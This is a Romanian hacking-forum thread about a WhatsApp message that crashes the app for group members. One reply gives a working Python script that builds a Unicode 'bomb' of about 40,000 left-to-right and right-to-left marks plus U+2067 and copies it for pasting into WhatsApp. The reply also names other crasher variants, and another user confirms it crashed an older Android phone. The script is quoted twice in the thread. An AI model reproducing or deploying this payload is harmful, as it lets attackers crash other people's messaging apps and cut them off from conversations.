TecHHH Posted June 14, 2021 Report Posted June 14, 2021 Am un grup de whatsapp si intrase un tip care a trimis o arhiva si de fiecare data cand incercam sa intru pe grup imi dadea whatsapp-ul crash, a trebuit sa intru pe whatsapp web si acolo nu aparea arhiva nici nimic, am sters tipul din grup si a trebuit sa sterg mesajele lui ca sa pot intra pe grup ca tot imi dadea crash. Desigur ceilalti membri din grup au patit la fel am facut spam si au putut sa intre oarecum cativa inapoi. Cineva stie ceva sau despre ce e vorba? Quote
Nytro Posted June 14, 2021 Report Posted June 14, 2021 Interesanta intamplarea, despre ce tip era vorba? Roman? Daca crashuieste ceva e un bug si uneori astfel de bug-uri pot fi exploatabile (desi sanse foarte mici). Daca faci rost de acel fisier sa ni-l dai si noua pe el. Nu ca as incepe sa ma uit eu pe el, dar il pot da unor persoane care au prezentat lucruri pe subiect la conferinte mari. Quote
TecHHH Posted June 16, 2021 Author Report Posted June 16, 2021 On 6/14/2021 at 4:10 PM, Nytro said: Interesanta intamplarea, despre ce tip era vorba? Roman? Daca crashuieste ceva e un bug si uneori astfel de bug-uri pot fi exploatabile (desi sanse foarte mici). Daca faci rost de acel fisier sa ni-l dai si noua pe el. Nu ca as incepe sa ma uit eu pe el, dar il pot da unor persoane care au prezentat lucruri pe subiect la conferinte mari. Am facut un research mai mare, nu este o arhiva este un cod binar pe care nu il pot vedea pe whatsapp web , si cu telefonu cum ai apasat sa intri pe chat da crash. Numele la codul ala binar este slayer 07, in rest n am idee de cum se foloseste probabil ai nevoie de ceva whatsapp modat. Ceea ce stiu este ca daca dai codul acela binar pe un grup de whatsapp cine vrea sa intre ia crash, ca sa remediezi asta trebuie sa intri pe whatsapp web si sa stergi mesajele lui cu " This message cannot be seen on whatsapp web. You can see it on the phone. " Dupa dispare si de pe telefon si poti intra inapoi :)). Si da tipul era roman desigur Quote
yoyois Posted June 16, 2021 Report Posted June 16, 2021 On 6/14/2021 at 4:10 PM, Nytro said: Interesanta intamplarea, despre ce tip era vorba? Roman? Daca crashuieste ceva e un bug si uneori astfel de bug-uri pot fi exploatabile (desi sanse foarte mici). Daca faci rost de acel fisier sa ni-l dai si noua pe el. Nu ca as incepe sa ma uit eu pe el, dar il pot da unor persoane care au prezentat lucruri pe subiect la conferinte mari. Dupa slayer 07 gasesti mizerii de genu' https://www.youtube.com/watch?v=s8pWeY87cy0 din care ar iesi ca e ceva bug din emoji!? Am cautat 2 minute si nu gasesc niste surse mai ok. Quote
andr82 Posted June 17, 2021 Report Posted June 17, 2021 Poate sunt persoane care utilizeaza versiuni mai vechi si dau click de mai multe ori pe elemente ce induc bufferoverflow in memorie ca in exemplul de mai jos. Exista totusi si versiuni noi care trec de protectia 'unicode' a whatsapp-ului ele se numesc: -"Binario", "Contact bombs", "Trava Zap", "Crashers" , "message/vcard crash" O versiune python care merge pe androidurile si ios mai vechi : mai intai instalati cu pip pyperclip pip install pyperclip dupa care scrieti codul in notepad: import pyperclip ltr = u'\u200E' rtl = u'\u200F' ltr_rtl = ltr + rtl bombmess = (ltr_rtl * 20000) #print(bombmess) #not recommended on crazy = u'\u2067' pyperclip.copy(crazy + bombmess) spam = pyperclip.paste() dupa care salvati in fisier cu extensia .py si rulati in cmd/terminal fisier.py simplu. textul de trimis pe whatsapp web se copie automat pe clipboard si trebuie doar sa dai paste in whatsapp... Cum functioneaza? Foloseste ~120k combinatii de caractere unicode compresate intr-un singur cod ca sa treaca de limita de caractere a protectiei whatsapp Fiecare se poate juca si gasi combinatii noi folosind prima coloana de aici pyperclip este doar pentru copy paste 200E si 200F sunt pentru left to right mark si right to left mark. 2067 este caracterul de compresie, fara acest caracter este posibil ca elemntele sa nu fie incarcate in memorie deorece este posibil ca whatsapp sa creada ca a primit un mesaj gol. Se pot adauga elemente care sa determine utilizatorul sa execute click de mai multe ori etc... 1 3 Quote
ardu2222 Posted June 17, 2021 Report Posted June 17, 2021 (edited) @andr82HTC desire 625 Android 6.X a picat din prima dupa 3 click-uri pe "Citeste mai mult..." Edited June 17, 2021 by ardu2222 Quote
TecHHH Posted June 18, 2021 Author Report Posted June 18, 2021 On 6/17/2021 at 4:10 AM, andr82 said: Poate sunt persoane care utilizeaza versiuni mai vechi si dau click de mai multe ori pe elemente ce induc bufferoverflow in memorie ca in exemplul de mai jos. Exista totusi si versiuni noi care trec de protectia 'unicode' a whatsapp-ului ele se numesc: -"Binario", "Contact bombs", "Trava Zap", "Crashers" , "message/vcard crash" O versiune python care merge pe androidurile si ios mai vechi : mai intai instalati cu pip pyperclip pip install pyperclip dupa care scrieti codul in notepad: import pyperclip ltr = u'\u200E' rtl = u'\u200F' ltr_rtl = ltr + rtl bombmess = (ltr_rtl * 20000) #print(bombmess) #not recommended on crazy = u'\u2067' pyperclip.copy(crazy + bombmess) spam = pyperclip.paste() dupa care salvati in fisier cu extensia .py si rulati in cmd/terminal fisier.py simplu. textul de trimis pe whatsapp web se copie automat pe clipboard si trebuie doar sa dai paste in whatsapp... Cum functioneaza? Foloseste ~120k combinatii de caractere unicode compresate intr-un singur cod ca sa treaca de limita de caractere a protectiei whatsapp Fiecare se poate juca si gasi combinatii noi folosind prima coloana de aici pyperclip este doar pentru copy paste 200E si 200F sunt pentru left to right mark si right to left mark. 2067 este caracterul de compresie, fara acest caracter este posibil ca elemntele sa nu fie incarcate in memorie deorece este posibil ca whatsapp sa creada ca a primit un mesaj gol. Se pot adauga elemente care sa determine utilizatorul sa execute click de mai multe ori etc... Faza este ca la tipul ala se intampla ceva ciudat nici macar nu trebuia sa dai citeste mai mult se bloca direct la toata lumea si dadea crash, dadeai click sa intri pe chat si nu intra direct lua crash wapp-ul, dupa am facut spam pe grup si cand am dat sa intru a mers ca nu se mai vedea slayer 07 ala, am incercat sa dau in sus sa il vad nici macar nu ajunge sa se vada ca deja lua crash wapp-ul Quote